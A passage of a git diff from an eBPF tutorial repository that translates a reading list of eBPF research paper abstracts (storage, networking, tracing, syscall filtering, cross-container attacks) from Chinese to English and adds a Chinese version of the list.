monitoring solutions. On the one hand, the rapid evolution of microservices places a significant burden on the utilization and maintenance of existing distributed tracing frameworks. On the other hand, complex infrastructure increases the probability of network performance problems and creates more blind spots on the network side. In this paper, we present DeepFlow, a network-centric distributed tracing framework for troubleshooting microservices. DeepFlow provides out-of-the-box tracing via a network-centric tracing plane and implicit context propagation. In addition, it eliminates blind spots in network infrastructure, captures network metrics in a low-cost way, and enhances correlation between different components and layers. We demonstrate analytically and empirically that DeepFlow is capable of locating microservice performance anomalies with negligible overhead. DeepFlow has already identified over 71 critical performance anomalies for more than 26 companies and has been utilized by hundreds of individual developers. Our production evaluations demonstrate that DeepFlow is able to save users hours of instrumentation efforts and reduce troubleshooting time from several hours to just a few minutes. SIGCOMM 23: ## Fast In-kernel Traffic Sketching in eBPF -扩展的伯克利数据包过滤器(eBPF)是一个基础设施,允许在不重新编译的情况下动态加载并直接在 Linux 内核中运行微程序。 +The extended Berkeley Packet Filter (eBPF) is an infrastructure that allows to dynamically load and run micro-programs directly in the Linux kernel without recompiling it. -在这项工作中,我们研究如何在 eBPF 中开发高性能的网络测量。我们以绘图为案例研究,因为它们具有支持广泛任务的能力,同时提供低内存占用和准确性保证。我们实现了 NitroSketch,一个用于用户空间网络的最先进的绘图,并表明用户空间网络的最佳实践不能直接应用于 eBPF,因为它的性能特点不同。通过应用我们学到的经验教训,我们将其性能提高了40%,与初级实现相比。 +In this work, we study how to develop high-performance network measurements in eBPF. We take sketches as case-study, given their ability to support a wide-range of tasks while providing low-memory footprint and accuracy guarantees. We implemented NitroSketch, the state-of-the-art sketch for user-space networking and show that best practices in user-space networking cannot be directly applied to eBPF, because of its different performance characteristics. By applying our lesson learned we improve its performance by 40% compared to a naive implementation. SIGCOMM 23: ## SPRIGHT: extracting the server from serverless computing! high-performance eBPF-based event-driven, shared-memory processing -无服务器计算在云环境中承诺提供高效、低成本的计算能力。然而,现有的解决方案,如Knative这样的开源平台,包含了繁重的组件,破坏了无服务器计算的目标。此外,这种无服务器平台缺乏数据平面优化,无法实现高效的、高性能的功能链,这也是流行的微服务开发范式的设施。它们为构建功能链使用的不必要的复杂和重复的功能严重降低了性能。"冷启动"延迟是另一个威慑因素。 +Serverless computing promises an efficient, low-cost compute capability in cloud environments. However, existing solutions, epitomized by open-source platforms such as Knative, include heavyweight components that undermine this goal of serverless computing. Additionally, such serverless platforms lack dataplane optimizations to achieve efficient, high-performance function chains that facilitate the popular microservices development paradigm. Their use of unnecessarily complex and duplicate capabilities for building function chains severely degrades performance. 'Cold-start' latency is another deterrent. -我们描述了 SPRIGHT,一个轻量级、高性能、响应式的无服务器框架。SPRIGHT 利用共享内存处理显著提高了数据平面的可伸缩性,通过避免不必要的协议处理和序列化-反序列化开销。SPRIGHT 大量利用扩展的伯克利数据包过滤器 (eBPF) 进行事件驱动处理。我们创造性地使用 eBPF 的套接字消息机制支持共享内存处理,其开销严格与负载成正比。与常驻、基于轮询的DPDK相比,SPRIGHT 在真实工作负载下实现了相同的数据平面性能,但 CPU 使用率降低了10倍。此外,eBPF 为 SPRIGHT 带来了好处,替换了繁重的无服务器组件,使我们能够以微不足道的代价保持函数处于"暖"状态。 +We describe SPRIGHT, a lightweight, high-performance, responsive serverless framework. SPRIGHT exploits shared memory processing and dramatically improves the scalability of the dataplane by avoiding unnecessary protocol processing and serialization-deserialization overheads. SPRIGHT extensively leverages event-driven processing with the extended Berkeley Packet Filter (eBPF). We creatively use eBPF's socket message mechanism to support shared memory processing, with overheads being strictly load-proportional. Compared to constantly-running, polling-based DPDK, SPRIGHT achieves the same dataplane performance with 10× less CPU usage under realistic workloads. Additionally, eBPF benefits SPRIGHT, by replacing heavyweight serverless components, allowing us to keep functions 'warm' with negligible penalty. -我们的初步实验结果显示,与 Knative 相比,SPRIGHT 在吞吐量和延迟方面实现了一个数量级的提高,同时大大减少了 CPU 使用,并消除了 "冷启动"的需要。 +Our preliminary experimental results show that SPRIGHT achieves an order of magnitude improvement in throughput and latency compared to Knative, while substantially reducing CPU usage, and obviates the need for 'cold-start'. -## Kgent: Kernel Extensions Large Language Model Agent +## KEN: Kernel Extensions using Natural Language -修改和扩展操作系统的能力是提高系统安全性、可靠性和性能的重要功能。扩展的伯克利数据包过滤器(eBPF)生态系统已经成为扩展Linux内核的标准机制,并且最近已被移植到Windows。eBPF程序将新逻辑注入内核,使系统在现有逻辑之前或之后执行这些逻辑。虽然eBPF生态系统提供了一种灵活的内核扩展机制,但目前开发人员编写eBPF程序仍然困难。eBPF开发人员必须深入了解操作系统的内部结构,以确定在何处放置逻辑,并应对eBPF验证器对其eBPF程序的控制流和数据访问施加的编程限制。本文介绍了KEN,一种通过允许使用自然语言编写内核扩展来缓解编写eBPF程序难度的替代框架。KEN利用大语言模型(LLMs)的最新进展,根据用户的英文提示生成eBPF程序。为了确保LLM的输出在语义上等同于用户的提示,KEN结合了LLM增强的程序理解、符号执行和一系列反馈循环。KEN的关键创新在于这些技术的结合。特别是,该系统以一种新颖的结构使用符号执行,使其能够结合程序综合和程序理解的结果,并建立在LLMs在每个任务中单独展示的成功基础上。为了评估KEN,我们开发了一个新的自然语言提示eBPF程序的语料库。我们显示,KEN在80%的情况下生成了正确的eBPF程序,这比LLM增强的程序综合基线提高了2.67倍。 +The ability to modify and extend an operating system is an important feature for improving a system's security, reliability, and performance. The extended Berkeley Packet Filters (eBPF) ecosystem has emerged as the standard mechanism for extending the Linux kernel and has recently been ported to Windows. eBPF programs inject new logic into the kernel that the system will execute before or after existing logic. While the eBPF ecosystem provides a flexible mechanism for kernel extension, it is difficult for developers to write eBPF programs today. An eBPF developer must have deep knowledge of the internals of the operating system to determine where to place logic and cope with programming limitations on the control flow and data accesses of their eBPF program enforced by the eBPF verifier. This paper presents KEN, an alternative framework that alleviates the difficulty of writing an eBPF program by allowing Kernel Extensions to be written in Natural language. KEN uses recent advances in large language models (LLMs) to synthesize an eBPF program given a user's English language prompt. To ensure that LLM's output is semantically equivalent to the user's prompt, KEN employs a combination of LLM-empowered program comprehension, symbolic execution, and a series of feedback loops. KEN's key novelty is the combination of these techniques. In particular, the system uses symbolic execution in a novel structure that allows it to combine the results of program synthesis and program comprehension and build on the recent success that LLMs have shown for each of these tasks individually. To evaluate KEN, we developed a new corpus of natural language prompts for eBPF programs. We show that KEN produces correct eBPF programs on 80% which is an improvement of a factor of 2.67 compared to an LLM-empowered program synthesis baseline. -eBPF'24: 和arxiv +eBPF'24: and arxiv ## Programmable System Call Security with eBPF -利用 eBPF 进行可编程的系统调用安全 - -系统调用过滤是一种广泛用于保护共享的 OS 内核免受不受信任的用户应用程序威胁的安全机制。但是,现有的系统调用过滤技术要么由于用户空间代理带来的上下文切换开销过于昂贵,要么缺乏足够的可编程性来表达高级策略。Seccomp 是 Linux 的系统调用过滤模块,广泛用于现代的容器技术、移动应用和系统管理服务。尽管采用了经典的 BPF 语言(cBPF),但 Seccomp 中的安全策略主要限于静态的允许列表,主要是因为 cBPF 不支持有状态的策略。因此,许多关键的安全功能无法准确地表达,和/或需要修改内核。 - -在这篇论文中,我们介绍了一个可编程的系统调用过滤机制,它通过利用扩展的 BPF 语言(eBPF)使得更高级的安全策略得以表达。更具体地说,我们创建了一个新的 Seccomp eBPF 程序类型,暴露、修改或创建新的 eBPF 助手函数来安全地管理过滤状态、访问内核和用户状态,以及利用同步原语。重要的是,我们的系统与现有的内核特权和能力机制集成,使非特权用户能够安全地安装高级过滤器。我们的评估表明,我们基于 eBPF 的过滤可以增强现有策略(例如,通过时间专化,减少早期执行阶段的攻击面积高达55.4%)、缓解实际漏洞并加速过滤器。 +System call filtering is a widely used security mechanism for protecting a shared OS kernel against untrusted user applications. However, existing system call filtering techniques either are too expensive due to the context switch overhead imposed by userspace agents, or lack sufficient programmability to express advanced policies. Seccomp, Linux's system call filtering module, is widely used by modern container technologies, mobile apps, and system management services. Despite the adoption of the classic BPF language (cBPF), security policies in Seccomp are mostly limited to static allow lists, primarily because cBPF does not support stateful policies. Consequently, many essential security features cannot be expressed precisely and/or require kernel modifications. +In this paper, we present a programmable system call filtering mechanism, which enables more advanced security policies to be expressed by leveraging the extended BPF language (eBPF). More specifically, we create a new Seccomp eBPF program type, exposing, modifying or creating new eBPF helper functions to safely manage filter state, access kernel and user state, and utilize synchronization primitives. Importantly, our system integrates with existing kernel privilege and capability mechanisms, enabling unprivileged users to install advanced filters safely. Our evaluation shows that our eBPF-based filtering can enhance existing policies (e.g., reducing the attack surface of early execution phase by up to 55.4% for temporal specialization), mitigate real-world vulnerabilities, and accelerate filters. ## Cross Container Attacks: The Bewildered eBPF on Clouds -在云上困惑的 eBPF 之间的容器攻击 - -扩展的伯克利数据包过滤器(eBPF)为用户空间程序提供了强大而灵活的内核接口,通过在内核空间直接运行字节码来扩展内核功能。它已被云服务广泛使用,以增强容器安全性、网络管理和系统可观察性。然而,我们发现在 Linux 主机上广泛讨论的攻击性 eBPF 可以为容器带来新的攻击面。通过 eBPF 的追踪特性,攻击者可以破坏容器的隔离并攻击主机,例如,窃取敏感数据、进行 DoS 攻击,甚至逃逸容器。在这篇论文中,我们研究基于 eBPF 的跨容器攻击,并揭示其在实际服务中的安全影响。利用 eBPF 攻击,我们成功地妨害了五个在线的 Jupyter/交互式 Shell 服务和 Google Cloud Platform 的 Cloud Shell。此外,我们发现三家领先的云供应商提供的 Kubernetes 服务在攻击者通过 eBPF 逃逸容器后可以被利用来发起跨节点攻击。具体来说,在阿里巴巴的 Kubernetes 服务中,攻击者可以通过滥用他们过度特权的云指标或管理 Pods 来妨害整个集群。不幸的是,容器上的 eBPF 攻击鲜为人知,并且现有的入侵检测系统几乎无法发现它们。此外,现有的 eBPF 权限模型无法限制 eBPF 并确保在共享内核的容器环境中安全使用。为此,我们提出了一个新的 eBPF 权限模型,以对抗容器中的 eBPF 攻击。 +The extended Berkeley Packet Filter (eBPF) provides powerful and flexible kernel interfaces to extend the kernel functions for user space programs via running bytecode directly in the kernel space. It has been widely used by cloud services to enhance container security, network management, and system observability. However, we discover that the offensive eBPF that have been extensively discussed in Linux hosts can bring new attack surfaces to containers. With eBPF tracing features, attackers can break the container's isolation and attack the host, e.g., steal sensitive data, DoS, and even escape the container. In this paper, we study the eBPF-based cross container attacks and reveal their security impacts in real world services. With eBPF attacks, we successfully compromise five online Jupyter/Interactive Shell services and the Cloud Shell of Google Cloud Platform. Furthermore, we find that the Kubernetes services offered by three leading cloud vendors can be exploited to launch cross-node attacks after the attackers escape the container via eBPF. Specifically, in Alibaba's Kubernetes services, attackers can compromise the whole cluster by abusing their over-privileged cloud metrics or management Pods. Unfortunately, the eBPF attacks on containers are seldom known and can hardly be discovered by existing intrusion detection systems. Also, the existing eBPF permission model cannot confine the eBPF and ensure secure usage in shared-kernel container environments. To this end, we propose a new eBPF permission model to counter the eBPF attacks in containers. ## Comparing Security in eBPF and WebAssembly -比较 eBPF 和 WebAssembly 中的安全性 - -本文研究了 eBPF 和 WebAssembly(Wasm)的安全性,这两种技术近年来得到了广泛的采用,尽管它们是为非常不同的用途和环境而设计的。当 eBPF 主要用于 Linux 等操作系统内核时,Wasm 是一个为基于堆栈的虚拟机设计的二进制指令格式,其用途超出了 web。鉴于 eBPF 的增长和不断扩大的雄心,Wasm 可能提供有启发性的见解,因为它围绕在如 web 浏览器和云等复杂和敌对环境中安全执行任意不受信任的程序进行设计。我们分析了两种技术的安全目标、社区发展、内存模型和执行模型,并进行了比较安全性评估,探讨了内存安全性、控制流完整性、API 访问和旁路通道。我们的结果表明,eBPF 有一个首先关注性能、其次关注安全的历史,而 Wasm 更强调安全,尽管要支付一些运行时开销。考虑 eBPF 的基于语言的限制和一个用于 API 访问的安全模型是未来工作的有益方向。 +This paper examines the security of eBPF and WebAssembly (Wasm), two technologies that have gained widespread adoption in recent years, despite being designed for very different use cases and environments. While eBPF is a technology primarily used within operating system kernels such as Linux, Wasm is a binary instruction format designed for a stack-based virtual machine with use cases extending beyond the web. Recognizing the growth and expanding ambitions of eBPF, Wasm may provide instructive insights, given its design around securely executing arbitrary untrusted programs in complex and hostile environments such as web browsers and clouds. We analyze the security goals, community evolution, memory models, and execution models of both technologies, and conduct a comparative security assessment, exploring memory safety, control flow integrity, API access, and side-channels. Our results show that eBPF has a history of focusing on performance first and security second, while Wasm puts more emphasis on security at the cost of some runtime overheads. Considering language-based restrictions for eBPF and a security model for API access are fruitful directions for future work. -更多内容可以在第一个 eBPF 研讨会中找到: +More about can be found in the first workshop: ## A flow-based IDS using Machine Learning in eBPF -基于eBPF中的机器学习的流式入侵检测系统 - -eBPF 是一种新技术,允许动态加载代码片段到 Linux 内核中。它可以大大加速网络,因为它使内核能够处理某些数据包而无需用户空间程序的参与。到目前为止,eBPF 主要用于简单的数据包过滤应用,如防火墙或拒绝服务保护。我们证明在 eBPF 中完全基于机器学习开发流式网络入侵检测系统是可行的。我们的解决方案使用决策树,并为每个数据包决定它是否恶意,考虑到网络流的整个先前上下文。与作为用户空间程序实现的同一解决方案相比,我们实现了超过 20% 的性能提升。 +eBPF is a new technology which allows dynamically loading pieces of code into the Linux kernel. It can greatly speed up networking since it enables the kernel to process certain packets without the involvement of a userspace program. So far eBPF has been used for simple packet filtering applications such as firewalls or Denial of Service protection. We show that it is possible to develop a flow based network intrusion detection system based on machine learning entirely in eBPF. Our solution uses a decision tree and decides for each packet whether it is malicious or not, considering the entire previous context of the network flow. We achieve a performance increase of over 20% compared to the same solution implemented as a userspace program. ## Femto-containers: lightweight virtualization and fault isolation for small software functions on low-power IoT microcontrollers -针对低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离: Femto-容器 - -低功耗的 IoT 微控制器上运行的操作系统运行时通常提供基础的 API、基本的连接性和(有时)一个(安全的)固件更新机制。相比之下,在硬件约束较少的场合,网络化软件已进入无服务器、微服务和敏捷的时代。考虑到弥合这一差距,我们在论文中设计了 Femto-容器,这是一种新的中间件运行时,可以嵌入到各种低功耗 IoT 设备中。Femto-容器使得可以在低功耗 IoT 设备上通过网络安全地部署、执行和隔离小型虚拟软件功能。我们实施了 Femto-容器,并在 RIOT 中提供了集成,这是一个受欢迎的开源 IoT 操作系统。然后,我们评估了我们的实现性能,它已被正式验证用于故障隔离,确保 RIOT 受到加载并在 Femto-容器中执行的逻辑的保护。我们在各种受欢迎的微控制器架构(Arm Cortex-M、ESP32 和 RISC-V)上的实验表明,Femto-容器在内存占用开销、能源消耗和安全性方面提供了有吸引力的权衡。 +Low-power operating system runtimes used on IoT microcontrollers typically provide rudimentary APIs, basic connectivity and, sometimes, a (secure) firmware update mechanism. In contrast, on less constrained hardware, networked software has entered the age of serverless, microservices and agility. With a view to bridge this gap, in the paper we design Femto-Containers, a new middleware runtime which can be embedded on heterogeneous low-power IoT devices. Femto-Containers enable the secure deployment, execution and isolation of small virtual software functions on low-power IoT devices, over the network. We implement Femto-Containers, and provide integration in RIOT, a popular open source IoT operating system. We then evaluate the performance of our implementation, which was formally verified for fault-isolation, guaranteeing that RIOT is shielded from logic loaded and executed in a Femto-Container. Our experiments on various popular micro-controller architectures (Arm Cortex-M, ESP32 and RISC-V) show that Femto-Containers offer an attractive trade-off in terms of memory footprint overhead, energy consumption, and security. + +> The original link of this article: diff --git a/src/18-further-reading/README.zh.md b/src/18-further-reading/README.zh.md new file mode 100644 index 0000000..3a71301 --- /dev/null +++ b/src/18-further-reading/README.zh.md @@ -0,0 +1,149 @@ +# 更多的参考资料:论文、项目等等 + +可以在这里找到更多关于 eBPF 的信息: + +- 一个关于 eBPF 相关内容和信息的详细列表: +- eBPF 相关项目、教程: + +这是我近年来读过的与 eBPF 相关的论文列表,可能对于对 eBPF 相关研究感兴趣的人有所帮助。 + +eBPF(扩展的伯克利数据包过滤器)是一种新兴的技术,允许在 Linux 内核中安全地执行用户提供的程序。近年来,它因加速网络处理、增强可观察性和实现可编程数据包处理而得到了广泛的应用。此文档列出了过去几年关于 eBPF 的一些关键研究论文。这些论文涵盖了 eBPF 的几个方面,包括加速分布式系统、存储和网络,正式验证 eBPF 的 JIT 编译器和验证器,将 eBPF 用于入侵检测,以及从 eBPF 程序自动生成硬件设计。 + +一些关键亮点: + +- eBPF 允许在内核中执行自定义函数,以加速分布式协议、存储引擎和网络应用,与传统的用户空间实现相比,可以提高吞吐量和降低延迟。 +- eBPF 组件(如 JIT 和验证器)的正式验证确保了正确性,并揭示了实际实现中的错误。 +- eBPF 的可编程性和效率使其适合在内核中完全构建入侵检测和网络监控应用。 +- 从 eBPF 程序中自动生成硬件设计允许软件开发人员快速生成网络卡中的优化数据包处理管道。 + +这些论文展示了 eBPF 在加速系统、增强安全性和简化网络编程方面的多功能性。随着 eBPF 的采用不断增加,它是一个与性能、安全性、硬件集成和易用性相关的系统研究的重要领域。 + +如果您有任何建议或添加论文的意见,请随时开放一个问题或PR。此列表创建于 2023.10,未来将添加新的论文。 + +> 如果您对 eBPF 有些进一步的兴趣的话,也可以查看我们在 [eunomia-bpf](https://github.com/eunomia-bpf) 的开源项目和 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 的 eBPF 教程。我也在寻找 2024/2025 年系统和网络领域的 PhD 相关机会,这是我的 [Github](https://github.com/yunwei37) 和 [邮箱](yunwei356@gmail.com)。 + +## XRP: In-Kernel Storage Functions with eBPF + +随着微秒级 NVMe 存储设备的出现,Linux 内核存储堆栈开销变得显著,几乎使访问时间翻倍。我们介绍了 XRP,一个框架,允许应用程序从 eBPF 在 NVMe 驱动程序中的钩子执行用户定义的存储功能,如索引查找或聚合,安全地绕过大部分内核的存储堆栈。为了保持文件系统的语义,XRP 将少量的内核状态传播到其 NVMe 驱动程序钩子,在那里调用用户注册的 eBPF 函数。我们展示了如何利用 XRP 显著提高两个键值存储,BPF-KV,一个简单的 B+ 树键值存储,和 WiredTiger,一个流行的日志结构合并树存储引擎的吞吐量和延迟。 + +OSDI '22 最佳论文: + +## Specification and verification in the field: Applying formal methods to BPF just-in-time compilers in the Linux kernel + +本文描述了我们将形式方法应用于 Linux 内核中的一个关键组件,即 Berkeley 数据包过滤器 (BPF) 虚拟机的即时编译器 ("JIT") 的经验。我们使用 Jitterbug 验证这些 JIT,这是第一个提供 JIT 正确性的精确规范的框架,能够排除实际错误,并提供一个自动化的证明策略,该策略可以扩展到实际实现。使用 Jitterbug,我们设计、实施并验证了一个新的针对 32 位 RISC-V 的 BPF JIT,在五个其他部署的 JIT 中找到并修复了 16 个之前未知的错误,并开发了新的 JIT 优化;所有这些更改都已上传到 Linux 内核。结果表明,在一个大型的、未经验证的系统中,通过仔细设计规范和证明策略,可以构建一个经过验证的组件。 + +OSDI 20: + +## λ-IO: A Unified IO Stack for Computational Storage + +新兴的计算存储设备为存储内计算提供了一个机会。它减少了主机与设备之间的数据移动开销,从而加速了数据密集型应用程序。在这篇文章中,我们介绍 λ-IO,一个统一的 IO 堆栈,跨主机和设备管理计算和存储资源。我们提出了一套设计 - 接口、运行时和调度 - 来解决三个关键问题。我们在全堆栈软件和硬件环境中实施了 λ-IO,并使用合成和实际应用程序对其 + +进行评估,与 Linux IO 相比,显示出高达 5.12 倍的性能提升。 + +FAST23: + +## Extension Framework for File Systems in User space + +用户文件系统相对于其内核实现提供了许多优势,例如开发的简易性和更好的系统可靠性。然而,它们会导致重大的性能损失。我们观察到现有的用户文件系统框架非常通用;它们由一个位于内核中的最小干预层组成,该层简单地将所有低级请求转发到用户空间。虽然这种设计提供了灵活性,但由于频繁的内核-用户上下文切换,它也严重降低了性能。 + +这项工作介绍了 ExtFUSE,一个用于开发可扩展用户文件系统的框架,该框架还允许应用程序在内核中注册"薄"的专用请求处理程序,以满足其特定的操作需求,同时在用户空间中保留复杂的功能。我们使用两个 FUSE 文件系统对 ExtFUSE 进行评估,结果表明 ExtFUSE 可以通过平均不到几百行的改动来提高用户文件系统的性能。ExtFUSE 可在 GitHub 上找到。 + +ATC 19: + +## Electrode: Accelerating Distributed Protocols with eBPF + +在标准的Linux内核网络栈下实现分布式协议可以享受到负载感知的CPU缩放、高兼容性以及强大的安全性和隔离性。但由于过多的用户-内核切换和内核网络栈遍历,其性能较低。我们介绍了Electrode,这是一套为分布式协议设计的基于eBPF的性能优化。这些优化在网络栈之前在内核中执行,但实现了与用户空间中实现的相似功能(例如,消息广播,收集ack的仲裁),从而避免了用户-内核切换和内核网络栈遍历所带来的开销。我们展示,当应用于经典的Multi-Paxos状态机复制协议时,Electrode可以提高其吞吐量高达128.4%,并将延迟降低高达41.7%。 + +NSDI 23: [链接](https://www.usenix.org/conference/nsdi23/presentation/zhou) + +## BMC: Accelerating Memcached using Safe In-kernel Caching and Pre-stack Processing + +内存键值存储是帮助扩展大型互联网服务的关键组件,通过提供对流行数据的低延迟访问。Memcached是最受欢迎的键值存储之一,由于Linux网络栈固有的性能限制,当使用高速网络接口时,其性能不高。虽然可以使用DPDK基础方案绕过Linux网络栈,但这种方法需要对软件栈进行完全重新设计,而且在客户端负载较低时也会导致高CPU利用率。 + +为了克服这些限制,我们提出了BMC,这是一个为Memcached设计的内核缓存,可以在执行标准网络栈之前服务于请求。对BMC缓存的请求被视为NIC中断的一部分,这允许性能随着为NIC队列服务的核心数量而扩展。为确保安全,BMC使用eBPF实现。尽管eBPF具有安全约束,但我们展示了实现复杂缓存服务是可能的。因为BMC在商用硬件上运行,并且不需要修改Linux内核或Memcached应用程序,所以它可以在现有系统上广泛部署。BMC优化了Facebook样式的小型请求的处理时间。在这个目标工作负载上,我们的评估显示,与原始的Memcached应用程序相比,BMC的吞吐量提高了高达18倍,与使用SO_REUSEPORT套接字标志的优化版Memcached相比,提高了高达6倍。此外,我们的结果还显示,对于非目标工作负载,BMC的开销可以忽略不计,并且不会降低吞吐量。 + +NSDI 21: [链接](https://www.usenix.org/conference/nsdi21/presentation/ghigoff) + +## hXDP: Efficient Software Packet Processing on FPGA NICs + +FPGA加速器在NIC上使得从CPU卸载昂贵的数据包处理任务成为可能。但是,FPGA有限的资源可能需要在多个应用程序之间共享,而编程它们则很困难。 + +我们提出了一种在FPGA上运行Linux的eXpress Data Path程序的解决方案,这些程序使用eBPF编写,仅使用可用硬件资源的一部分,同时匹配高端CPU的性能。eBPF的迭代执行模型不适合FPGA加速器。尽管如此,我们展示了,当针对一个特定的FPGA执行器时,一个eBPF程序的许多指令可以被压缩、并行化或完全删除,从而显著提高性能。我们利用这一点设计了hXDP,它包括(i)一个优化编译器,该编译器并行化并将eBPF字节码转换为我们定义的扩展eBPF指令集架构;(ii)一个在FPGA上执行这些指令的软处理器;以及(iii)一个基于FPGA的基础设施,提供XDP的maps和Linux内核中定义的helper函数。 + +我们在FPGA NIC上实现了hXDP,并评估了其运行真实世界的未经修改的eBPF程序的性能。我们的实现以156.25MHz的速度时钟,使用约15%的FPGA资源,并可以运行动态加载的程序。尽管有这些适度的要求,但它达到了高端CPU核心的数据包处理吞吐量,并提供了10倍低的数据包转发延迟。 + +OSDI 20: [链接](https://www.usenix.org/conference/osdi20/presentation/brunella) + +## Network-Centric Distributed Tracing with DeepFlow: Troubleshooting Your Microservices in Zero Code + +微服务正变得越来越复杂,给传统的性能监控解决方案带来了新的挑战。一方面,微服务的快速演变给现有的分布式跟踪框架的使用和维护带来了巨大的负担。另一方面,复杂的基础设施增加了网络性能问题的概率,并在网络侧创造了更多的盲点。在这篇论文中,我们介绍了 DeepFlow,一个用于微服务故障排除的以网络为中心的分布式跟踪框架。DeepFlow 通过一个以网络为中心的跟踪平面和隐式的上下文传播提供开箱即用的跟踪。此外,它消除了网络基础设施中的盲点,以低成本方式捕获网络指标,并增强了不同组件和层之间的关联性。我们从分析和实证上证明,DeepFlow 能够准确地定位微服务性能异常,而开销几乎可以忽略不计。DeepFlow 已经为超过26家公司发现了71多个关键性能异常,并已被数百名开发人员所使用。我们的生产评估显示,DeepFlow 能够为用户节省数小时的仪表化工作,并将故障排除时间从数小时缩短到几分钟。 + +SIGCOMM 23: + +## Fast In-kernel Traffic Sketching in eBPF + +扩展的伯克利数据包过滤器(eBPF)是一个基础设施,允许在不重新编译的情况下动态加载并直接在 Linux 内核中运行微程序。 + +在这项工作中,我们研究如何在 eBPF 中开发高性能的网络测量。我们以绘图为案例研究,因为它们具有支持广泛任务的能力,同时提供低内存占用和准确性保证。我们实现了 NitroSketch,一个用于用户空间网络的最先进的绘图,并表明用户空间网络的最佳实践不能直接应用于 eBPF,因为它的性能特点不同。通过应用我们学到的经验教训,我们将其性能提高了40%,与初级实现相比。 + +SIGCOMM 23: + +## SPRIGHT: extracting the server from serverless computing! high-performance eBPF-based event-driven, shared-memory processing + +无服务器计算在云环境中承诺提供高效、低成本的计算能力。然而,现有的解决方案,如Knative这样的开源平台,包含了繁重的组件,破坏了无服务器计算的目标。此外,这种无服务器平台缺乏数据平面优化,无法实现高效的、高性能的功能链,这也是流行的微服务开发范式的设施。它们为构建功能链使用的不必要的复杂和重复的功能严重降低了性能。"冷启动"延迟是另一个威慑因素。 + +我们描述了 SPRIGHT,一个轻量级、高性能、响应式的无服务器框架。SPRIGHT 利用共享内存处理显著提高了数据平面的可伸缩性,通过避免不必要的协议处理和序列化-反序列化开销。SPRIGHT 大量利用扩展的伯克利数据包过滤器 (eBPF) 进行事件驱动处理。我们创造性地使用 eBPF 的套接字消息机制支持共享内存处理,其开销严格与负载成正比。与常驻、基于轮询的DPDK相比,SPRIGHT 在真实工作负载下实现了相同的数据平面性能,但 CPU 使用率降低了10倍。此外,eBPF 为 SPRIGHT 带来了好处,替换了繁重的无服务器组件,使我们能够以微不足道的代价保持函数处于"暖"状态。 + +我们的初步实验结果显示,与 Knative 相比,SPRIGHT 在吞吐量和延迟方面实现了一个数量级的提高,同时大大减少了 CPU 使用,并消除了 "冷启动"的需要。 + + + +## Kgent: Kernel Extensions Large Language Model Agent + +修改和扩展操作系统的能力是提高系统安全性、可靠性和性能的重要功能。扩展的伯克利数据包过滤器(eBPF)生态系统已经成为扩展Linux内核的标准机制,并且最近已被移植到Windows。eBPF程序将新逻辑注入内核,使系统在现有逻辑之前或之后执行这些逻辑。虽然eBPF生态系统提供了一种灵活的内核扩展机制,但目前开发人员编写eBPF程序仍然困难。eBPF开发人员必须深入了解操作系统的内部结构,以确定在何处放置逻辑,并应对eBPF验证器对其eBPF程序的控制流和数据访问施加的编程限制。本文介绍了KEN,一种通过允许使用自然语言编写内核扩展来缓解编写eBPF程序难度的替代框架。KEN利用大语言模型(LLMs)的最新进展,根据用户的英文提示生成eBPF程序。为了确保LLM的输出在语义上等同于用户的提示,KEN结合了LLM增强的程序理解、符号执行和一系列反馈循环。KEN的关键创新在于这些技术的结合。特别是,该系统以一种新颖的结构使用符号执行,使其能够结合程序综合和程序理解的结果,并建立在LLMs在每个任务中单独展示的成功基础上。为了评估KEN,我们开发了一个新的自然语言提示eBPF程序的语料库。我们显示,KEN在80%的情况下生成了正确的eBPF程序,这比LLM增强的程序综合基线提高了2.67倍。 + +eBPF'24: 和arxiv + +## Programmable System Call Security with eBPF + +利用 eBPF 进行可编程的系统调用安全 + +系统调用过滤是一种广泛用于保护共享的 OS 内核免受不受信任的用户应用程序威胁的安全机制。但是,现有的系统调用过滤技术要么由于用户空间代理带来的上下文切换开销过于昂贵,要么缺乏足够的可编程性来表达高级策略。Seccomp 是 Linux 的系统调用过滤模块,广泛用于现代的容器技术、移动应用和系统管理服务。尽管采用了经典的 BPF 语言(cBPF),但 Seccomp 中的安全策略主要限于静态的允许列表,主要是因为 cBPF 不支持有状态的策略。因此,许多关键的安全功能无法准确地表达,和/或需要修改内核。 + +在这篇论文中,我们介绍了一个可编程的系统调用过滤机制,它通过利用扩展的 BPF 语言(eBPF)使得更高级的安全策略得以表达。更具体地说,我们创建了一个新的 Seccomp eBPF 程序类型,暴露、修改或创建新的 eBPF 助手函数来安全地管理过滤状态、访问内核和用户状态,以及利用同步原语。重要的是,我们的系统与现有的内核特权和能力机制集成,使非特权用户能够安全地安装高级过滤器。我们的评估表明,我们基于 eBPF 的过滤可以增强现有策略(例如,通过时间专化,减少早期执行阶段的攻击面积高达55.4%)、缓解实际漏洞并加速过滤器。 + + + +## Cross Container Attacks: The Bewildered eBPF on Clouds + +在云上困惑的 eBPF 之间的容器攻击 + +扩展的伯克利数据包过滤器(eBPF)为用户空间程序提供了强大而灵活的内核接口,通过在内核空间直接运行字节码来扩展内核功能。它已被云服务广泛使用,以增强容器安全性、网络管理和系统可观察性。然而,我们发现在 Linux 主机上广泛讨论的攻击性 eBPF 可以为容器带来新的攻击面。通过 eBPF 的追踪特性,攻击者可以破坏容器的隔离并攻击主机,例如,窃取敏感数据、进行 DoS 攻击,甚至逃逸容器。在这篇论文中,我们研究基于 eBPF 的跨容器攻击,并揭示其在实际服务中的安全影响。利用 eBPF 攻击,我们成功地妨害了五个在线的 Jupyter/交互式 Shell 服务和 Google Cloud Platform 的 Cloud Shell。此外,我们发现三家领先的云供应商提供的 Kubernetes 服务在攻击者通过 eBPF 逃逸容器后可以被利用来发起跨节点攻击。具体来说,在阿里巴巴的 Kubernetes 服务中,攻击者可以通过滥用他们过度特权的云指标或管理 Pods 来妨害整个集群。不幸的是,容器上的 eBPF 攻击鲜为人知,并且现有的入侵检测系统几乎无法发现它们。此外,现有的 eBPF 权限模型无法限制 eBPF 并确保在共享内核的容器环境中安全使用。为此,我们提出了一个新的 eBPF 权限模型,以对抗容器中的 eBPF 攻击。 + + + +## Comparing Security in eBPF and WebAssembly + +比较 eBPF 和 WebAssembly 中的安全性 + +本文研究了 eBPF 和 WebAssembly(Wasm)的安全性,这两种技术近年来得到了广泛的采用,尽管它们是为非常不同的用途和环境而设计的。当 eBPF 主要用于 Linux 等操作系统内核时,Wasm 